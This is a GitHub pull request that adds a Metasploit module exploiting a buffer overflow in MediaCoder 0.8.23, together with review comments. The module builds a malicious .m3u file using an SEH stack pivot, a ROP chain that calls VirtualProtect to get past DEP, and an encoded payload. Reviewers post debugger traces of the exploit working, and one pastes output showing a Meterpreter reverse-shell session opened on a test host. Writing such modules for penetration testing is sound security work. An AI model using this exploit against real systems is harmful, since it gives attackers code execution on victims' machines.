-
Notifications
You must be signed in to change notification settings - Fork 13.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added MediaCoder exploit module #2081
Changes from 2 commits
b8354d3
23d2bfc
ecb2667
ed6d88a
b2a18c3
8de88cb
16c9eff
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,123 @@ | ||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# web site for more information on licensing and terms of use. | ||
# http://metasploit.com/ | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = NormalRanking | ||
|
||
include Msf::Exploit::FILEFORMAT | ||
include Msf::Exploit::Seh | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'MediaCoder .M3U Buffer Overflow', | ||
'Description' => %q{ | ||
This module exploits a buffer overflow in MediaCoder 0.8.23. The vulnerability | ||
occurs when adding an .m3u, allowing arbitrary code execution under the context | ||
of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder | ||
runs with DEP. This module has been tested successfully on MediaCoder 0.8.23.5530 | ||
over Windows XP SP3 and Windows 7 SP1. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'metacom', # Vulnerability discovery and PoC | ||
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. A comma is needed at the end of entry There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Strange, msftidy doesn't complain about it. Will add it on next commit. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. msftidy doesn't check this. But if you run msfconsole, you will see a complaint though :-) |
||
'otoy <otoy[at]spentera.com>' # Metasploit module | ||
], | ||
'References' => | ||
[ | ||
[ 'OSVDB', '94522' ], | ||
[ 'EDB', '26403' ] | ||
], | ||
'DefaultOptions' => | ||
{ | ||
'EXITFUNC' => 'seh' | ||
}, | ||
'Platform' => 'win', | ||
'Payload' => | ||
{ | ||
'Space' => 1200, | ||
'BadChars' => "\x00\x5c\x40\x0d\x0a", | ||
'DisableNops' => true, | ||
'StackAdjustment' => -3500, | ||
}, | ||
'Targets' => | ||
[ | ||
[ 'MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1', | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Generated test case:
So:
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Hmm strange, I can confirm that this works for me from 0.8.22.5525 - 0.8.23.5530. Both tested across VM and physical box. MediaCoder 0.8.22.5525 - 0.8.23.5530 on Windows 7 SP1 (Physical Box) (1218.be4): Break instruction exception - code 80000003 (first chance)
eax=7ff9e000 ebx=00000000 ecx=00000000 edx=76e9f17d esi=00000000 edi=00000000
eip=76e3410c esp=06b1ff5c ebp=06b1ff88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
76e3410c cc int 3
0:029> g
(1218.1618): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000093 ebx=7577ad60 ecx=04d34c88 edx=fb3fb378 esi=005308c8 edi=000307d0
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210282
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a mov byte ptr [edx+ecx],al ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
postproc_52+14435 (6afd4435)
Invalid exception stack at 1b765fa5
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll -
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> dd /c1 esp
0012f464 6ab16202
0012f468 6ab16202
0012f46c 6ab16202
0012f470 6ab16202
0012f474 6ab16202
0012f478 6ab16202
0012f47c 6ab16202
0012f480 6ab16202
0012f484 6ab16202
0012f488 100482ff
0012f48c ffffffc0
0012f490 7a69494a
0012f494 66d9d9ba
0012f498 6ab2241d
0012f49c 44716254
0012f4a0 44716254
0012f4a4 44716254
0012f4a8 44716254
0012f4ac 44716254
0012f4b0 44716254
0012f4b4 44716254
0012f4b8 44716254
0012f4bc 44716254
0012f4c0 44716254
0012f4c4 44716254
0012f4c8 44716254
0012f4cc 44716254
0012f4d0 44716254
0012f4d4 44716254
0012f4d8 1004a8ee
0012f4dc 6ab561b0
0012f4e0 66d9feee in handler: msf exploit(handler) > exploit
[*] Started reverse handler on 10.10.10.10:443
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.10.10.11
[*] Meterpreter session 1 opened (10.10.10.10:443 -> 10.10.10.11:1934) at 2013-07-09 02:01:29 +0700
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
meterpreter > quit There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Hmm, not working for me on Win 7 SP1 either. (windows/exec payload):
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Strange, works for me with windows/exec payload too. (88c.10a4): Break instruction exception - code 80000003 (first chance)
eax=7ffdb000 ebx=00000000 ecx=00000000 edx=76e9f17d esi=00000000 edi=00000000
eip=76e3410c esp=02ccff5c ebp=02ccff88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
76e3410c cc int 3
0:028> g
(88c.1404): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000bd ebx=7577ad60 ecx=04e4d968 edx=fb2e2698 esi=005308c8 edi=000f05c0
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210286
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a mov byte ptr [edx+ecx],al ds:0023:00130000=41
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll -
0:000> !exdhain
No export exdhain found
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
postproc_52+14435 (6afd4435)
Invalid exception stack at e82d1026
0:000> bp 0x6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll -
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76e471ad esi=6ab16202 edi=6ab16202
eip=6ab16202 esp=0012f468 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
swscale_2!sws_get_class+0xf002:
6ab16202 c3 ret
0:000> dd /c1 esp
0012f464 6ab16202
0012f468 6ab16202
0012f46c 6ab16202
0012f470 6ab16202
0012f474 6ab16202
0012f478 6ab16202
0012f47c 6ab16202
0012f480 6ab16202
0012f484 6ab16202
0012f488 100482ff
0012f48c ffffffc0
0012f490 6970504f
0012f494 66d9d9ba
0012f498 6ab2241d
0012f49c 7a784c49
0012f4a0 7a784c49
0012f4a4 7a784c49
0012f4a8 7a784c49
0012f4ac 7a784c49
0012f4b0 7a784c49
0012f4b4 7a784c49
0012f4b8 7a784c49
0012f4bc 7a784c49
0012f4c0 7a784c49
0012f4c4 7a784c49
0012f4c8 7a784c49
0012f4cc 7a784c49
0012f4d0 7a784c49
0012f4d4 7a784c49
0012f4d8 1004cc03
0012f4dc 6ab561b0
0012f4e0 66d9feee I've tested it with 0.8.22.5525 and 0.8.23.5530: 0:000> lmv m mediacoder
start end module name
00400000 005c7000 mediacoder C (no symbols)
Loaded symbol image file: C:\Program Files\MediaCoder\mediacoder.exe
Image path: C:\Program Files\MediaCoder\mediacoder.exe
Image name: mediacoder.exe
Timestamp: Mon Jun 17 23:30:07 2013 (51BF398F)
CheckSum: 00000000
ImageSize: 001C7000
File version: 0.8.22.0
Product version: 0.8.22.0
File flags: 8 (Mask 1F) Private
File OS: 4 Unknown Win32
File type: 0.0 Unknown
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Broad Intelligence
ProductName: MediaCoder
InternalName: mediacoder
OriginalFilename: MediaCoder.exe
ProductVersion: 0, 8, 22, 5525
FileVersion: 0, 8, 22, 5525
FileDescription: MediaCoder
LegalCopyright: (C)2005-2013 Developed by Stanley Huang All Rights Reserved
LegalTrademarks: MediaCoder
Comments: http://www.mediacoderhq.com |
||
{ | ||
'Ret' => 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret) | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Ideally you want to print which DLL this address belongs to, better documentation :-) There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Noted. |
||
'Offset' => 849, | ||
'Max' => 5000 | ||
} | ||
], | ||
], | ||
'Privileged' => false, | ||
'DisclosureDate' => 'Jun 24, 2013', | ||
'DefaultTarget' => 0)) | ||
|
||
register_options( | ||
[ | ||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), | ||
], self.class) | ||
|
||
end | ||
|
||
def junk(n=1) | ||
return [rand_text_alpha(4).unpack("L")[0]] * n | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Why is the random text repeated |
||
end | ||
|
||
def nops(rop=false, n=1) | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Isn't this redundant with There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. No, it isn't, allow ROP compatible nops, which make_nops doesn't allow. But this function should use make_nops when rop is false. The problem is with the semantics, when asking for 1 nop with rop == false, indeed he is trying to do make_nops(4). |
||
return rop ? [0x6ab21799] * n : [0x90909090] * n | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I guess this gadget (ret gadget at 0x6ab21799? ) is target specific (MediaCoder 0.8.23.5530 in this case). If it's the case, should be on the target metadata. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Yes you're correct. I'll change it to 0x6ab16202 from swscale-2.dll, that would be universal I think.. |
||
end | ||
|
||
def exploit | ||
|
||
rop_gadgets = | ||
[ | ||
nops(true,35), # ROP NOP | ||
0x100482ff, # POP EAX # POP EBP # RETN | ||
0xffffffc0, # negate will become 0x00000040 | ||
junk, | ||
0x66d9d9ba, # NEG EAX # RETN | ||
0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN | ||
junk(15), # reserve more junk for add esp,2c | ||
0x1004a8ee, # POP ECX # RETN | ||
0x6ab561b0, # ptr to &VirtualProtect() | ||
0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN | ||
0x6ab19780, # XCHG EAX,ESI # RETN | ||
0x66d929f5, # POP EAX # POP EBX # RETN | ||
0xfffffcc0, # negate will become 0x0000033f | ||
junk, | ||
0x6ab3c65a, # NEG EAX # RETN | ||
0x1004cc03, # POP ECX # RETN | ||
0xffffffff, # | ||
0x660166e9, # INC ECX # SUB AL,0EB # RETN | ||
0x66d8ae48, # XCHG ECX,EBX # RETN | ||
0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Which DLL is this? Looks like this ROP chain uses multiple DLLs? There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Noted. Will add all rop DLL info. |
||
0x6ab3d688, # POP ECX # RETN | ||
0x6ab4ead0, # Writable address | ||
0x100444e3, # POP EDI # RETN | ||
nops(true), # ROP NOP | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Why use a There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Because of ROP compatible nops, which aren't supported by make_nops. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. A ROP NOP is typically an address to a RET instruction. The make_nops() function generates something that replaces 0x90. Two different things. |
||
0x10048377, # POP EAX # POP EBP # RETN | ||
nops, # Regular NOPs | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Are these nops really needed? |
||
0x6ab01c06, # PUSH ESP# RETN | ||
0x6ab28dda, # PUSHAD # RETN | ||
].flatten.pack("V*") | ||
|
||
sploit = "http://" | ||
sploit << rand_text(target['Offset']) | ||
sploit << [target.ret].pack('V') | ||
sploit << rop_gadgets | ||
sploit << make_nops(16) | ||
sploit << payload.encoded | ||
sploit << rand_text(target['Max']-sploit.length) | ||
|
||
file_create(sploit) | ||
end | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is this mixin used? If isn't used the include should be deleted.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Of course, I missed that one. Will be removed on next commit.